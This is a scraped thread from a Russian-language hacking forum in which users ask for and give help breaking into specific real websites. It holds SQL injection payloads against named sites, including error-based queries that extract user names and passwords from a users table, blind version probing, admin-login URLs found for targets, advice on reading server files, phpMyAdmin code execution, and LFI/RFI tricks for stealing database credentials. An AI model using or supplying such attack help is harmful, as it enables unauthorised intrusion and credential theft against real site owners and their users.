Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    про /scripts/setup.php
    я так и не понял, что ты имел в виду.
    если ты про код, который берется с ftp, то никаких там проблем с кавычками нет, сейчас протестил:
    PHP:
    <?php 
    echo "<br>".get_magic_quotes_gpc()."<br>";
    echo 
    "'x'<br>";
    echo 
    $_SERVER['PHP_SELF'];
    exit;
    ?>
    =>
    1
    'x'
    /pma/scripts/setup.php

    кстати, если бы "проблемы" с кавычками были бы, то их легко можно было бы решить при помощи, например, eval(base64_decode(blalba))) ]


    кста,
    вариант с кодом на ftp не работает при allow_url_fopen = Off
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    но насколько помню по дефолту ulr_fopen=On
     
    _________________________
  3. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    помогите найти столбцы, брут не помог
    Version: 4.0.26-nt

    Code:
    http://www.brew-monkey.com/brewschool/hop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    и что ты ожидаешь? что у кого то есть паранормальный брут который прям угадает столбцы?сам делай словарь и бруть по нему...

    попробуй прочитать файлы на сервере, c:/boot.ini
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    попробуй в эту сторону глянуть, у них там этот форум:

    http://forum.snitz.com/

    бесплатный, скачай и посмотри таблицы/колонки
     
    1 person likes this.
  6. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    а можно рабочий пример где это потестить можно ?
    или хотя бы версию pma и mysql
    бо у себя пробовал на localhost, phpMyAdmin-2.10.2, 5.1.40-community - не фига не выходит :(


    ps:
    здесь: http://forum.antichat.ru/threadnav46016-340-10.html
    и здесь: http://forum.antichat.ru/threadnav50669-1-40-phpMyAdmin.html все прочел
     
  7. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://www.tullamorechamber.com/

    хелп, где тут алминка?
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://tullamorechamber.com/Adm/MyLogin.php?Page=/Adm/
     
    1 person likes this.
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу попасть в админку.

    http://alvand.basu.ac.ir/~flora/family.php?id=29+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,Id,
    user_name,
    password)+from+users+limit+0,1),1,64),floor(rand(0)*2)))z)+--+

    Id,
    user_name,
    password

    http://alvand.basu.ac.ir/login.php

    aa:ss
    a:a
     
  10. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    есть доступ к админке каторая правит странички.



    добавляю <? echo("ololol"); ?>

    Но выводит почему-то как html :(:


    <td>
    <?php echo("dd");
    ?>
    2
    </td>

    почему такая шляпа?
     
    #13690 InfectedM, 19 Jun 2010
    Last edited: 19 Jun 2010
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Потому что страничка небойсь в mysql идёт?
    Из mysql, знаешь ли не интерпретируется код..
    Вы вообще читать умеете, я про ту багу, которую я описал пару страничек назад?
     
  12. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    помояите наыти админку
    поjaлуста

    http://www.ycap.am/
    i
    http://piccolino.am/
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    /controlpanel/
    У обоих, но это хостинг, пробуй мб войдёшь.
     
  14. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    da eto cPanel//
    a mne admin panel
     
  15. GIG

    GIG New Member

    Joined:
    17 Apr 2010
    Messages:
    46
    Likes Received:
    4
    Reputations:
    5
    Кравлером проходил ? Если да , то вариантов поиска я более не вижу.
     
  16. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    http://www.ycap.am/admin/adminlogin.php
    http://piccolino.am/cms/login.php
     
  17. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    канэчна рядовой [на кэпа, чисто по званию, сие изречения как-то не тянет :) ]

    17.06.2010, 18:01 Ctacok
    17.06.2010, 19:21 Ctacok
    Цитата:
    где там ?
    речь шла о http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/ где используется уязвимость unserialize() а не где создается новый config/config.inc.php. если ты тут админ, то не значит что ты кого-то умнее, это значит что тебе непозволительно тупить, что ты как раз похоже и сделал. если я не прав, объясни на "пальцах" чего я не "сумел прочитать", только конкретно, понятно и с цитатами/ссылками, а не голословными заявлениями и объяснениями не понятно о каких дырах.
     
    1 person likes this.
  18. iSlava

    iSlava New Member

    Joined:
    24 Aug 2009
    Messages:
    72
    Likes Received:
    4
    Reputations:
    0
    а как можно заюзать open_basedir bypass удалённо?
    пробовал инклудить через Data протокол, не получалось (RFC 2397)
    еще есть идея попробовать обойти ограничение на длину в addslashes, сработает? или для open_basedir пофиг будет?
     
  19. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите вывести версию БД.

    http://www.barenbrug.sk/index.php?siteid=66&page=item&nieuwsid=210')+and+substring(version(),1,1)=5+and+('1'='1

    , или какие баги у этого движка:

    RegioProviders CMS: 4.1.1, DB 4.1.1
     
  20. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    iSlava
    попробуй Чтение php-кода из файла при наличии LFI
    можешь, если прокатит, исходники сайта с данными для коннекта к mysql угнать
    как же, там же, в Self-contained RFI in PHP посмотри исполнение через php://input, может он прокатит, раз через data не прокатило.
     
Thread Status:
Not open for further replies.